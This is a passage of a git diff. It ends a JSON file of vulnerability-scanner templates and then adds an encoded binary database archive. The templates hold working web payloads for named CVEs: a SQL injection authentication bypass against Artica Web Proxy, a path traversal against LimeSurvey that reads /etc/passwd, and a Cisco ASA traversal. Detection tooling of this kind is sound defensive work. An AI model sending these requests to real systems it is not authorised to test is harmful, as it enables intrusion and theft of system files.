Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  <max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]}]}
\ No newline at end of file
diff --git a/db/db.tar.zst b/db/db.tar.zst
new file mode 100644
index 0000000000000000000000000000000000000000..05a3eb286674842b0ffce66e229502355e6991d3
GIT binary patch
literal 553525
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
